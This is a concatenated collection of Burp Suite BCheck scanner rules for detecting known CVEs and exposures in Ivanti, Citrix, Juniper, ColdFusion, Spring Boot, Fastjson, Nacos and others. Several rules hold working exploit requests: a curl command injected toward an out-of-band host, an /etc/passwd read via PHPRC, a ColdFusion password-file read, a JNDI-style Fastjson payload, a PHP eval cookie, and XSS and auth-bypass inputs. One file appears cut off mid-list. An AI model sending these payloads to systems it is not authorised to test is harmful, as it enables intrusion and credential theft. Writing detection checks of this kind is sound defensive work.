{potential_path}.` 30 | remediation: "Ensure loggers actuator is not exposed." 31 | end if -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2023-38035 - Ivanti Sentry - Auth Bypass.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "CVE-2023-38035 - Ivanti Sentry - Auth Bypass" 4 | description: "Checks for CVE-2023-38035" 5 | author: "Dolph Flynn" 6 | tags: "CVE-2023-38035", "ivanti", "mobileiron", "OAST" 7 | 8 | 9 | define: 10 | collatorator_payload = `{generate_collaborator_address()}/?{random_str(123)}` 11 | trimmed_collaborator_payload = `{regex_replace ({collatorator_payload}, "(?<=^.{71}).*" , "")}` # trims payload to 71 characters! 12 | 13 | 14 | given host then 15 | send request called check: 16 | `POST /mics/services/MICSLogService HTTP/1.1 17 | Host: {base.request.url.host} 18 | User-Agent: {user_agent} 19 | Connection: close 20 | Content-Length: 133 21 | Content-Type: application/json 22 | 23 | {base64_decode("YwEAbQAYdXBsb2FkRmlsZVVzaW5nRmlsZUlucHV0TVMAB2NvbW1hbmRTAEw=")}curl {trimmed_collaborator_payload}{base64_decode("UwAGaXNSb290VHpOeg==")}` 24 | 25 | if {check.response.status_code} is "200" and "isRunningTzz" in {check.response.body} and dns interactions then 26 | 27 | report issue: 28 | severity: high 29 | confidence: certain 30 | detail: "Ivanti Sentry - Authentication Bypass." 31 | 32 | end if 33 | 34 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2023-5244-Microweber less than V.2.0-Cross-Site-Scripting.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "CVE-2023-5244 - Microweber < V.2.0 - Cross-Site Scripting" 4 | description: "Reflected Cross-Site Scripting Vulnerability in types GET parameter on the /editor_tools/rte_image_editor endpoint." 5 | author: "Nithissh" 6 | 7 | run for each: 8 | # you could add more values to this list to make the check repeat 9 | potential_path = 10 | "/editor_tools/rte_image_editor?types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27" 11 | 12 | given host then 13 | send request called check: 14 | method: "GET" 15 | path: {potential_path} 16 | 17 | if "200" in {check.response.status_code} and "text/html" in {check.response.headers} 18 | and "alert(document.domain)" in {check.response.headers} 19 | and "microweber" in {check.response.headers} then 20 | report issue: 21 | severity: medium 22 | confidence: certain 23 | detail: `Reflected XSS found at {potential_path}.` 24 | remediation: "Upgrade to the latest version and for reference: https://huntr.dev/bounties/a3bd58ba-ca59-4cba-85d1-799f73a76470" 25 | end if 26 | -------------------------------------------------------------------------------- /other/OAuth/OpenID-Dynamic-Client-Registration-Endpoint-Detected.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "OpenID Connect Dynamic Registration Endpoint Detected" 4 | author: "Machiavelli" 5 | description: "Actively checks if the OpenID Connect configuration endpoint (/.well-known/openid-configuration) exists and exposes a 'registration_endpoint', indicating dynamic client registration support." 6 | tags: "OpenID Connect", "active" 7 | 8 | define: 9 | config_endpoint = "/.well-known/openid-configuration" 10 | 11 | given host then 12 | send request called config_check: 13 | method: "GET" 14 | path: {config_endpoint} 15 | if {config_check.response.status_code} is "200" 16 | and "\"registration_endpoint\":" in {config_check.response.body} then 17 | report issue: 18 | severity: high 19 | confidence: certain 20 | detail: "The OpenID Connect configuration endpoint (/.well-known/openid-configuration) is accessible and includes a 'registration_endpoint' field, indicating support for dynamic client registration, potential SSRF, check https://portswigger.net/research/hidden-oauth-attack-vectors." 21 | remediation: "Review the dynamic registration implementation for SSRF vulnerabilities and patch it." 22 | end if 23 | -------------------------------------------------------------------------------- /other/exposed-laravel-telescope.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Exposed Laravel Telescope Endpoint" 4 | description: "A Laravel Telescope was discovered, which exposed log files, requests and some information containing app secrets." 5 | author: "Yasin Yilmaz" 6 | tags: "laravel", "telescope", "php" 7 | 8 | run for each: 9 | potential_path = 10 | "/telescope/requests", 11 | "/telescope/commands", 12 | "/telescope/logs", 13 | "/telescope", 14 | "/_debugbar/telescope/", 15 | "/public/telescope", 16 | "/en/public/telescope" 17 | 18 | given host then 19 | send request called check: 20 | method: "GET" 21 | path: {potential_path} 22 | 23 | if {check.response.status_code} is "200" and "Laravel Telescope" in {check.response.body} or "/telescope/favicon.ico" in {check.response.body} or "Telescope" in {check.response.body} then 24 | report issue: 25 | severity: high 26 | confidence: firm 27 | detail: `A Laravel Telescope was discovered at {potential_path}, which exposed log files, requests and some information containing app secrets. ` 28 | remediation: "The instance of Laravel Telescope should be restricted." 29 | end if 30 | -------------------------------------------------------------------------------- /vulnerability-classes/injection/SSTI-Razor.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: ".NET Razor SSTI Injection" 4 | description: "Inserts a .NET Razor SSTI payload into each parameter to detect suspicious input evaluation" 5 | author: "alp1n3.eth" 6 | tags: "active", "injection", "template", "template injection", "scan", "ssti", "razor" 7 | # reference 1: https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/ 8 | # reference 2: https://www.schtech.co.uk/razor-pages-ssti-rce/ 9 | 10 | 11 | define: 12 | calculation = "@(1337*1337)" 13 | answer = "1787569" 14 | 15 | 16 | given query or body insertion point then 17 | if not({answer} in {base.response}) then 18 | send payload: 19 | replacing: {calculation} 20 | 21 | if {answer} in {latest.response} then 22 | report issue: 23 | severity: high 24 | confidence: firm 25 | detail: "The application evaluates input in a way that suggests it is vulnerable to ASP.NET Razor SSTI. This may potentially be escalated to achieving C# execution (RCE)." 26 | remediation: "Manual investigation is advised. Do not build templates dynamically from user-controlled data." 27 | 28 | end if 29 | end if 30 | -------------------------------------------------------------------------------- /other/fastjson/Fastjson-1.2.80-Deserialization-RCE.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Fastjson 1.2.80 Deserialization RCE" 4 | description: "https://github.com/su18/hack-fastjson-1.2.80" 5 | author: "Javeley" 6 | tags: "Fastjson", "Deserialization","RCE","Alibaba" 7 | 8 | define: 9 | payload =`[\{"@type": "java.lang.Exception","@type": "com.alibaba.fastjson.JSONException","x": \{"@type": "java.net.InetSocketAddress"\{"address":,"val": "rmi://{generate_collaborator_address()}/{random_str(4)}"}}},\{"@type": "java.lang.Exception","@type": "com.alibaba.fastjson.JSONException","message": \{"@type": "java.net.InetSocketAddress"\{"address":,"val": "rmi://{generate_collaborator_address()}/{random_str(4)}"}}}]` 10 | 11 | 12 | given request then 13 | 14 | if {base.request.body} matches "^[{]" and "application/json" in {base.request.headers} then 15 | send request: 16 | body: {payload} 17 | 18 | if dns interactions then 19 | report issue: 20 | severity: high 21 | confidence: certain 22 | detail: "If two DNS requests are received, it proves version 1.2.83 is used. If one DNS request is received, it proves version 1.2.80 is used.https://github.com/su18/hack-fastjson-1.2.80." 23 | remediation: "" 24 | end if 25 | end if -------------------------------------------------------------------------------- /other/springboot/Springboot conditions actuator.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Springboot conditions actuator" 4 | description: "Springboot conditions actuator exposed" 5 | author: "Mateusz Dabrowski (dbrwsky)" 6 | tags: "actuator", "springboot", "exposure", "informative" 7 | 8 | run for each: 9 | potential_path = 10 | "/conditions", 11 | "/actuator/conditions" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | if {check.response.status_code} is "200" 19 | and "\"positiveMatches\"" in {check.response.body} 20 | and "\"unconditionalClasses\"" in {check.response.body} 21 | and ("application/json" in {check.response.headers} 22 | or "application/vnd.spring-boot.actuator" in {check.response.headers} 23 | or "application/vnd.spring-boot.actuator.v1+json" in {check.response.headers} 24 | or "application/vnd.spring-boot.actuator.v2+json" in {check.response.headers} 25 | or "application/vnd.spring-boot.actuator.v3+json" in {check.response.headers}) then 26 | report issue: 27 | severity: low 28 | confidence: certain 29 | detail: `Springboot conditions actuator found at {potential_path}.` 30 | remediation: "Ensure conditions actuator is not exposed." 31 | end if -------------------------------------------------------------------------------- /other/springboot/Springboot scheduledtasks actuator.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Springboot scheduledtasks actuator" 4 | description: "Springboot scheduledtasks actuator may expose sensitive information" 5 | author: "Mateusz Dabrowski (dbrwsky)" 6 | tags: "actuator", "springboot", "exposure", "informative" 7 | 8 | run for each: 9 | potential_path = 10 | "/scheduledtasks", 11 | "/actuator/scheduledtasks" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | if {check.response.status_code} is "200" 19 | and "\"cron\"" in {check.response.body} 20 | and "\"fixedDelay\"" in {check.response.body} 21 | and ("application/json" in {check.response.headers} 22 | or "application/vnd.spring-boot.actuator" in {check.response.headers} 23 | or "application/vnd.spring-boot.actuator.v1+json" in {check.response.headers} 24 | or "application/vnd.spring-boot.actuator.v2+json" in {check.response.headers} 25 | or "application/vnd.spring-boot.actuator.v3+json" in {check.response.headers}) then 26 | report issue: 27 | severity: low 28 | confidence: certain 29 | detail: `Springboot scheduledtasks actuator found at {potential_path}.` 30 | remediation: "Ensure scheduledtasks actuator is not exposed" 31 | end if -------------------------------------------------------------------------------- /other/springboot/Springboot threaddump actuator.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Springboot threaddump actuator" 4 | description: "Springboot threaddump actuator provides a thread dump from the application's JVM" 5 | author: "Mateusz Dabrowski (dbrwsky)" 6 | tags: "actuator", "springboot", "exposure", "informative" 7 | 8 | run for each: 9 | potential_path = 10 | "/threaddump", 11 | "/actuator/threaddump" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | if {check.response.status_code} is "200" 19 | and "\"threads\":" in {check.response.body} 20 | and "\"threadName\":" in {check.response.body} 21 | and ("application/json" in {check.response.headers} 22 | or "application/vnd.spring-boot.actuator" in {check.response.headers} 23 | or "application/vnd.spring-boot.actuator.v1+json" in {check.response.headers} 24 | or "application/vnd.spring-boot.actuator.v2+json" in {check.response.headers} 25 | or "application/vnd.spring-boot.actuator.v3+json" in {check.response.headers}) then 26 | report issue: 27 | severity: low 28 | confidence: certain 29 | detail: `Springboot threaddump actuator found at {potential_path}.` 30 | remediation: "Ensure threaddump actuator is not exposed." 31 | end if -------------------------------------------------------------------------------- /other/springboot/Springboot env actuator.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Springboot env actuator" 4 | description: "Springboot env actuator may expose sensitive information" 5 | author: "Mateusz Dabrowski (dbrwsky)" 6 | tags: "actuator", "springboot", "exposure", "informative" 7 | 8 | run for each: 9 | potential_path = 10 | "/env", 11 | "/actuator/env" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | if {check.response.status_code} is "200" 19 | and ("applicationConfig" in {check.response.body} or "activeProfiles" in {check.response.body}) 20 | and "server.port" in {check.response.body} 21 | and ("application/json" in {check.response.headers} 22 | or "application/vnd.spring-boot.actuator" in {check.response.headers} 23 | or "application/vnd.spring-boot.actuator.v1+json" in {check.response.headers} 24 | or "application/vnd.spring-boot.actuator.v2+json" in {check.response.headers} 25 | or "application/vnd.spring-boot.actuator.v3+json" in {check.response.headers}) then 26 | report issue: 27 | severity: low 28 | confidence: certain 29 | detail: `Springboot env actuator found at {potential_path}.` 30 | remediation: "Ensure env actuator is not exposed or doesn't contain sensitive information." 31 | end if -------------------------------------------------------------------------------- /other/prometheus/exposed-prometheus-api-endpoints.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Exposed Prometheus API Endpoints" 4 | description: "Check for exposed Prometheus Config, Flags and Targets API endpoints." 5 | author: "@nightshiba" 6 | 7 | run for each: 8 | # Prometheus API endpoints: https://prometheus.io/docs/prometheus/latest/querying/api/ and https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ 9 | potential_path = 10 | "/api/v1/status/config", 11 | "/api/v1/status/flags", 12 | "/api/v1/targets" 13 | 14 | given host then 15 | send request called check: 16 | method: "GET" 17 | path: {potential_path} 18 | 19 | if {check.response.status_code} is "200" 20 | and {check.response.body} matches "\"status\": \"success\"" 21 | and {check.response.body} matches "\"data\":" 22 | and {check.response.headers} matches "application/json" then 23 | report issue: 24 | severity: info 25 | confidence: certain 26 | detail: "The Prometheus API endpoint at {potential_path} is exposed publicly and could disclose sensitive information about the application's configuration, flags or targets." 27 | remediation: "Ensure that the Prometheus API endpoints are not publicly accessible and are properly secured." 28 | end if 29 | -------------------------------------------------------------------------------- /other/prometheus/exposed-generic-prometheus-metrics.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Exposed Generic Prometheus Metrics" 4 | description: "Check for information disclosure from any exporter" 5 | author: "@nightshiba" 6 | 7 | run for each: 8 | # Prometheus metrics most popular endpoints, you can add some more organization-specific 9 | potential_path = 10 | "/metrics", # default 11 | "/sys/metrics", # hashicorp vault 12 | "/monitoring/prometheus", 13 | "/pro/metrics" 14 | 15 | given host then 16 | send request called check: 17 | method: "GET" 18 | path: {potential_path} 19 | 20 | # format specification: https://prometheus.io/docs/concepts/data_model/ and https://prometheus.io/docs/instrumenting/exposition_formats/#text-based-format 21 | if {check.response.status_code} is "200" 22 | and {check.response.body} matches "((# (HELP|TYPE) .*)|([a-zA-Z_:][a-zA-Z0-9_:]*(\{([a-zA-Z_][a-zA-Z0-9_]*=.*(,\s)?)+\})?\s+.*))" 23 | and {check.response.headers} matches "text/plain" then 24 | report issue: 25 | severity: low 26 | confidence: certain 27 | detail: `Prometheus metrics exposed at {potential_path}.` 28 | remediation: "Ensure your Prometheus metrics are not accessible outside of the monitoring stack." 29 | end if 30 | -------------------------------------------------------------------------------- /other/bypass/waf-bypass.bcheck: -------------------------------------------------------------------------------- 1 | #Verified: Yes 2 | metadata: 3 | language: v1-beta 4 | name: "WAF-bypass" 5 | description: "Use different payloads to try to bypass the WAF or get an idea of how it can be bypassed" 6 | author: "Brumens" 7 | tags: "waf", "firewall", "bypass" 8 | 9 | define: 10 | param = "dummyparam" 11 | trackHeader = "X-BCheck" 12 | trackValue = "waf-bypass" 13 | 14 | run for each: 15 | payload = 16 | " 4.2.8" 31 | end if 32 | 33 | end if 34 | -------------------------------------------------------------------------------- /other/springboot/Springboot trace actuator.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Springboot trace actuator" 4 | description: "Springboot trace actuator displays trace information (by default the last few HTTP requests)." 5 | author: "Mateusz Dabrowski (dbrwsky)" 6 | tags: "actuator", "springboot", "exposure", "informative" 7 | 8 | run for each: 9 | potential_path = 10 | "/trace", 11 | "/actuator/trace", 12 | "/httptrace", 13 | "/actuator/httptrace" 14 | 15 | 16 | given host then 17 | send request called check: 18 | method: "GET" 19 | path: {potential_path} 20 | 21 | if {check.response.status_code} is "200" 22 | and "\"timestamp\"" in {check.response.body} 23 | and "\"info\"" in {check.response.body} 24 | and "\"method\"" in {check.response.body} 25 | and "\"path\"" in {check.response.body} 26 | and ("application/json" in {check.response.headers} 27 | or "application/vnd.spring-boot.actuator" in {check.response.headers} 28 | or "application/vnd.spring-boot.actuator.v1+json" in {check.response.headers} 29 | or "application/vnd.spring-boot.actuator.v2+json" in {check.response.headers} 30 | or "application/vnd.spring-boot.actuator.v3+json" in {check.response.headers}) then 31 | report issue: 32 | severity: low 33 | confidence: certain 34 | detail: `Springboot trace actuator found at {potential_path}.` 35 | end if -------------------------------------------------------------------------------- /other/csrf_magic_backdoor.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "CSRF-Magic backdoor detected" 4 | description: "Tests if code for the CSRF-Magic backdoor is triggered. " 5 | author: "MOGWAI LABS GmbH" 6 | 7 | given path then 8 | send request called check: 9 | method: "GET" 10 | replacing headers: 11 | "Cookie": "a=ab;b=;c=ZWNobyAiY3NyZi1tYWdpYyI7Ly8=;d=;" 12 | 13 | if "csrf-magic" in {check.response.body} then 14 | report issue: 15 | severity: high 16 | confidence: firm 17 | detail: `CSRF-Magic cookie backdoor was discovered. 18 | 19 | This backdoor was present in old versions of the CSRF-magic library 20 | and allows an unauthenticated attacker to evaluate arbitrary PHP code by setting malicious cookies. 21 | 22 | * The vulnerable code can be found here: https://web.archive.org/web/20220325023755/https://github.com/csrf-magic/csrf-magic/blob/master/csrf-magic.php 23 | * A writeup for the vulnerabilty can be found here: https://www.labs.greynoise.io/grimoire/2024-02-what-is-this-old-ivanti-exploit/index.html 24 | * A real-world example where this backdoor was expliotable: https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US 25 | ` 26 | remediation: "Ensure you remove the backdoored code from the csrf-magic.php file and investigate the server for indicators of compromise." 27 | end if 28 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2025-5777 - CitrixBleed 2.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "[CVE-2025-5777] Citrix Netscaler CitrixBleed 2" 4 | description: "This rule checks if the remote host is vulnerable to CVE-2025-5777 - CitrixBleed 2" 5 | author: "Felipe Molina (@felmoltor)" 6 | tags: "CVE-2025-5777","citrix","netscaler","leak" 7 | 8 | define: 9 | login_path = 10 | "/p/u/doAuthentication.do" 11 | 12 | given host then 13 | send request called check_leak: 14 | method: "POST" 15 | path: {login_path} 16 | body: "login" 17 | 18 | if {check_leak.response.body} matches "([^<]+)([^<>]*)" then 19 | report issue: 20 | severity: high 21 | confidence: firm 22 | detail: " 23 | The remote server responded with a non-empty string within the node upon a login request. 24 | This may indicate the server is prone to a memory leak which could disclose sensitive information stored in the memory of the device. 25 | For further information, refer to: 26 | * https://labs.watchtowr.com/how-much-more-must-we-bleed-citrix-netscaler-memory-disclosure-citrixbleed-2-cve-2025-5777/ 27 | " 28 | remediation: "Refer to: https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX693420" 29 | 30 | end if 31 | 32 | -------------------------------------------------------------------------------- /other/springboot/Springboot autoconfig actuator.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Springboot autoconfig actuator" 4 | description: "Springboot autoconfig actuator may expose sensitive information" 5 | author: "Mateusz Dabrowski (dbrwsky)" 6 | tags: "actuator", "springboot", "exposure", "informative" 7 | 8 | run for each: 9 | potential_path = 10 | "/autoconfig", 11 | "/actuator/autoconfig" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | if {check.response.status_code} is "200" 19 | and "\"positiveMatches\"" in {check.response.body} 20 | and "\"AuditAutoConfiguration#auditListener\"" in {check.response.body} 21 | and "\"EndpointAutoConfiguration#beansEndpoint\"" in {check.response.body} 22 | and ("application/json" in {check.response.headers} 23 | or "application/vnd.spring-boot.actuator" in {check.response.headers} 24 | or "application/vnd.spring-boot.actuator.v1+json" in {check.response.headers} 25 | or "application/vnd.spring-boot.actuator.v2+json" in {check.response.headers} 26 | or "application/vnd.spring-boot.actuator.v3+json" in {check.response.headers}) then 27 | report issue: 28 | severity: low 29 | confidence: certain 30 | detail: `Springboot autoconfig actuator found at {potential_path}.` 31 | remediation: "Ensure autoconfig is not exposed." 32 | end if -------------------------------------------------------------------------------- /other/springboot/Springboot configprops actuator.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Springboot configprops actuator" 4 | description: "Springboot configprops actuator may expose sensitive information" 5 | author: "Mateusz Dabrowski (dbrwsky)" 6 | tags: "actuator", "springboot", "exposure", "informative" 7 | 8 | run for each: 9 | potential_path = 10 | "/configprops", 11 | "/actuator/configprops" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | if {check.response.status_code} is "200" 19 | and "org.springframework.boot.actuate" in {check.response.body} 20 | and "\"beans\"" in {check.response.body} 21 | and "\"contexts\"" in {check.response.body} 22 | and ("application/json" in {check.response.headers} 23 | or "application/vnd.spring-boot.actuator" in {check.response.headers} 24 | or "application/vnd.spring-boot.actuator.v1+json" in {check.response.headers} 25 | or "application/vnd.spring-boot.actuator.v2+json" in {check.response.headers} 26 | or "application/vnd.spring-boot.actuator.v3+json" in {check.response.headers}) then 27 | report issue: 28 | severity: low 29 | confidence: certain 30 | detail: `Springboot configprops actuator found at {potential_path}.` 31 | remediation: "Ensure configprops is not exposed or doesn't contain sensitive information." 32 | end if -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2023-36845 Juniper Networks - PHP External Variable Modification.bcheck: -------------------------------------------------------------------------------- 1 | #https://vulncheck.com/blog/juniper-cve-2023-36845 2 | metadata: 3 | language: v1-beta 4 | name: "CVE-2023-36845 Juniper Networks - PHP External Variable Modification" 5 | author: "Joao Paulo Assis (j0hnZ3RA)" 6 | description: "Check for CVE-2023-36845." 7 | tags: "CVE-2023-36845" 8 | 9 | define: 10 | target_path = "/?PHPRC=/dev/fd/0" 11 | 12 | given host then 13 | send request called check: 14 | method: "POST" 15 | replacing headers: 16 | "Content-Type": "application/x-www-form-urlencoded" 17 | path: {target_path} 18 | body: "auto_prepend_file=\"/etc/passwd\"" 19 | 20 | if {check.response.status_code} is "200" and "root" in {check.response.body} and "Juniper" in {check.response.body} then 21 | report issue: 22 | severity: high 23 | confidence: certain 24 | detail: "A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to remotely execute code. Using a crafted request which sets the variable PHPRC an attacker is able to modify the PHP execution environment allowing the injection und execution of code." 25 | remediation: "Upgrade Juniper SRX firewalls and EX switches to the latest version" 26 | end if 27 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2023-26360 Adobe ColdFusion Arbitrary File Read and Code Execution.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2023-26360 Adobe ColdFusion Arbitrary File Read and Code Execution" 4 | description: "Checks for CVE-2023-26360" 5 | author: "Ollie Whitehouse" 6 | tags: "CVE-2023-26360 CVE ColdFusion" 7 | 8 | # Details of the vulnerability can be found in https://www.rapid7.com/blog/post/2023/07/11/cve-2023-29298-adobe-coldfusion-access-control-bypass/ 9 | define: 10 | potential_path = 11 | "//CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx" 12 | 13 | given host then 14 | send request called check: 15 | method: "POST" 16 | replacing headers: 17 | "Content-Type": "application/x-www-form-urlencoded" 18 | path: {potential_path} 19 | body: "_variables={\"about\":{\"_metadata\":{\"classname\":\"\\..\\lib\\password.properties\"},\"_variables\":{}}}" 20 | 21 | # Checks that we get a 200 AND that the output we expect in the result 22 | if {check.response.status_code} is "200" and "password=" in {check.response.body} then 23 | report issue: 24 | severity: high 25 | confidence: certain 26 | detail: "Host is vulnerable to the arbitrary file read and code execution vulnerability CVE-2023-26360" 27 | remediation: "See Adobe's APSB23-40 Security Bulletin - CF2018 Update 17, CF2021 Update 7, and CF2023 GA build for patched version" 28 | end if 29 | -------------------------------------------------------------------------------- /other/sentinel/Alibaba-Sentinel-SSRF.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Alibaba Sentinel SSRF " 4 | description: "Alibaba Sentinel 1.8.2 is vulnerable to Server-side request forgery (SSRF)." 5 | author: "Javeley" 6 | tags: "SSRF", "CVE-2021-44139","Alibaba" 7 | 8 | define: 9 | ssrf_path=`/registry/machine?app={random_str(5)}&appType=0&version=0&hostname={random_str(5)}&ip={generate_collaborator_address()}&port=0` 10 | 11 | given host then 12 | send request: 13 | method: "GET" 14 | path: {ssrf_path} 15 | if dns interactions then 16 | if http interactions then 17 | report issue: 18 | severity: high 19 | confidence: firm 20 | detail: `CVE-2021-44139. Sentinel before 1.8.3 is vulnerable to Server-side request forgery (SSRF). You can access host/version to view the Sentinel version. fofa body="sentinelDashboardApp"` 21 | remediation: "https://github.com/alibaba/Sentinel/issues/2451" 22 | else then 23 | report issue: 24 | severity: high 25 | confidence: firm 26 | detail: `CVE-2021-44139. Sentinel before 1.8.3 is vulnerable to Server-side request forgery (SSRF). You can access host/version to view the Sentinel version. fofa body="sentinelDashboardApp"` 27 | remediation: "https://github.com/alibaba/Sentinel/issues/2451" 28 | end if 29 | end if 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2018-1000129 - Jolokia 137 - Cross-Site Scripting.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2018-1000129 - Jolokia 1.3.7 - Cross-Site Scripting" 4 | description: "Jolokia 1.3.7 is vulnerable to cross-site scripting in the HTTP servlet and allows an attacker to execute malicious JavaScript in the victim's browser." 5 | author: "Mateusz Dabrowski (dbrwsky)" 6 | tags: "jolokia", "xss", "cve" 7 | 8 | run for each: 9 | potential_path = 10 | "/api/jolokia/read?mimeType=text/html", 11 | "/jolokia/read?mimeType=text/html" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | if {check.response.status_code} is "200" 19 | and "" in {check.response.body} 20 | and "java.lang.IllegalArgumentException" in {check.response.body} 21 | and "No type with name" in {check.response.body} 22 | and "text/html" in {check.response.headers} then 23 | report issue: 24 | severity: medium 25 | confidence: certain 26 | detail: `Jolokia 1.3.7 is vulnerable to cross-site scripting in the HTTP servlet and allows an attacker to execute malicious JavaScript in the victim's browser.` 27 | remediation: "Upgrade Jolokia to the latest version" 28 | end if 29 | -------------------------------------------------------------------------------- /other/bypass/403-429-bypass.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "403/429 bypass using HTTP Header" 4 | description: "Attempts to bypass 403/429 using the HTTP headers with local IP address" 5 | author: "Shadow Surface" 6 | tags: "bypass" 7 | 8 | define: 9 | bypass_ip = "127.0.0.1" 10 | 11 | run for each: 12 | bypass_header = 13 | "Forwarded", 14 | "Via", 15 | "X-Client-IP", 16 | "X-Forwarded-For", 17 | "X-Forwarded-Host", 18 | "X-Forwarded-Proto", 19 | "X-Forwarded-Server", 20 | "X-Forward-For", 21 | "X-Forwared-Host", 22 | "X-Host", 23 | "X-Originating-IP", 24 | "X-Real-IP", 25 | "X-Remote-Addr", 26 | "X-Remote-IP", 27 | "X-Requested-By", 28 | "X-Requested-For", 29 | "X-Trusted-IP" 30 | 31 | given request then 32 | if {base.response.status_code} matches "(403|429)" then 33 | send request: 34 | replacing headers: 35 | {bypass_header}: {bypass_ip} 36 | 37 | if not( {latest.response.status_code} is {base.response.status_code} ) then 38 | report issue: 39 | severity: high 40 | confidence: tentative 41 | detail: `Potential {base.response.status_code} bypass using {bypass_header} header.` 42 | remediation: `Avoid using {bypass_header} for authorization or rate limiting.` 43 | end if 44 | end if 45 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2023-24488 - Citrix Gateway Open Redirect and XSS.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "[CVE-2023-24488] Vulnerable Citrix Gateway Detected." 4 | description: "This rule checks if the remote host is vulnerable to CVE-2023-24488 - Citrix CRLF Injection / Reflected Xss" 5 | author: "TheButcher" 6 | tags: "CVE-2023-24488","citrix","crlf","xss","openredirection" 7 | 8 | define: 9 | potential_path = 10 | "/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E" 11 | 12 | given host then 13 | send request called check: 14 | method: "GET" 15 | path: {potential_path} 16 | 17 | if "" in {check.response.body} then 18 | report issue: 19 | severity: medium 20 | confidence: certain 21 | detail: "The post_logout_redirect_uri GET Parameter is susceptible to Open Redirection, which can be exploited for CRLF injection leading to XSS through HTTP Response Splitting. There is also a potential risk of cache poisoning if Citrix Gateway is deployed in such a configuration." 22 | remediation: "Affected customers of Citrix ADC and Citrix Gateway are recommended to install the relevant updated versions of Citrix ADC or Citrix Gateway as soon as possible - https://support.citrix.com/article/CTX477714/citrix-adc-and-citrix-gateway-security-bulletin-for-cve202324487-cve202324488" 23 | 24 | end if 25 | -------------------------------------------------------------------------------- /other/nacos/Nacos-severidentity-bypass.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Nacos ServerIdentity Bypass" 4 | description: "Nacos <= 2.2.0 - ServerIdentity Bypass" 5 | tags: "Unauthorized","Nacos" 6 | author: "JaveleyQAQ" 7 | 8 | run for each: 9 | nacos_detect = 10 | "/nacos/v1/auth/users?pageNo=1&pageSize=9&search=accurate&accessToken=", 11 | "/v1/auth/users?pageNo=1&pageSize=9&search=accurate&accessToken=" 12 | 13 | given host then 14 | send request called nacos: 15 | method: "GET" 16 | path: {nacos_detect} 17 | appending headers: 18 | "serverIdentity": "security" 19 | 20 | if {nacos.response.status_code} is "200" and "application/json" in {nacos.response.headers} and "\"username\":" in {nacos.response.body} and "\"password\":" in {nacos.response.body} then 21 | report issue: 22 | severity: high 23 | confidence: certain 24 | detail: `Nacos <= 2.2.0 platform adds "serverIdentity: security" to the header to bypass authentication and view the list of users. \nhttps://github.com/MrWQ/vulnerability-paper/blob/55e4dca8b537b93c6b90008af2f7eddd68271f2c/bugs/%E9%82%A3%E4%BA%9B%E5%B9%B4%E6%88%91%E4%BB%AC%E4%B8%80%E8%B5%B7%E8%BF%BD%E8%BF%87%E7%9A%84%20Nacos.md` 25 | remediation: `Change the default value of token.secret.key in the application.properties file. Refer to https://nacos.io/zh-cn/docs/v2/guide/user/auth.html` 26 | end if 27 | 